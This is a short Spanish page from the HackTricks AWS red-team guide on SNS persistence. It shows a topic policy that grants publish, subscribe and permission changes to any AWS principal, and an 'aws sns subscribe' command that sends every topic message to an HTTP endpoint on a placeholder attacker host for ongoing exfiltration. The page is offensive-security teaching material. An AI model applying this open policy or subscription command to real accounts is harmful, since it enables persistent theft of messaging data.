Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert) ! Otras formas de apoyar a HackTricks:
Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF , consulta los PLANES DE SUSCRIPCIÓN
Copiar {
"Version" : "2008-10-17" ,
"Id" : "__default_policy_ID" ,
"Statement" : [
{
"Sid" : "__default_statement_ID" ,
"Effect" : "Allow" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : [
"SNS:Publish" ,
"SNS:RemovePermission" ,
"SNS:SetTopicAttributes" ,
"SNS:DeleteTopic" ,
"SNS:ListSubscriptionsByTopic" ,
"SNS:GetTopicAttributes" ,
"SNS:AddPermission" ,
"SNS:Subscribe"
] ,
"Resource" : "arn:aws:sns:us-east-1:318142138553:MySNS.fifo" ,
"Condition" : {
"StringEquals" : {
"AWS:SourceOwner" : "318142138553"
}
}
} ,
{
"Sid" : "__console_pub_0" ,
"Effect" : "Allow" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : "SNS:Publish" ,
"Resource" : "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
} ,
{
"Sid" : "__console_sub_0" ,
"Effect" : "Allow" ,
"Principal" : {
"AWS" : "*"
} ,
"Action" : "SNS:Subscribe" ,
"Resource" : "arn:aws:sns:us-east-1:318142138553:MySNS.fifo"
}
]
} Para continuar exfiltrando todos los mensajes de todos los temas, un atacante podría crear suscriptores para todos los temas .
Copiar aws sns subscribe --region < regio n > \
--protocol http \
--notification-endpoint http:// < attacke r > / \
--topic-arn < ar n > Aprende hacking en AWS de cero a héroe con htARTE (HackTricks AWS Red Team Expert) ! Otras formas de apoyar a HackTricks:
Si quieres ver a tu empresa anunciada en HackTricks o descargar HackTricks en PDF consulta los PLANES DE SUSCRIPCIÓN
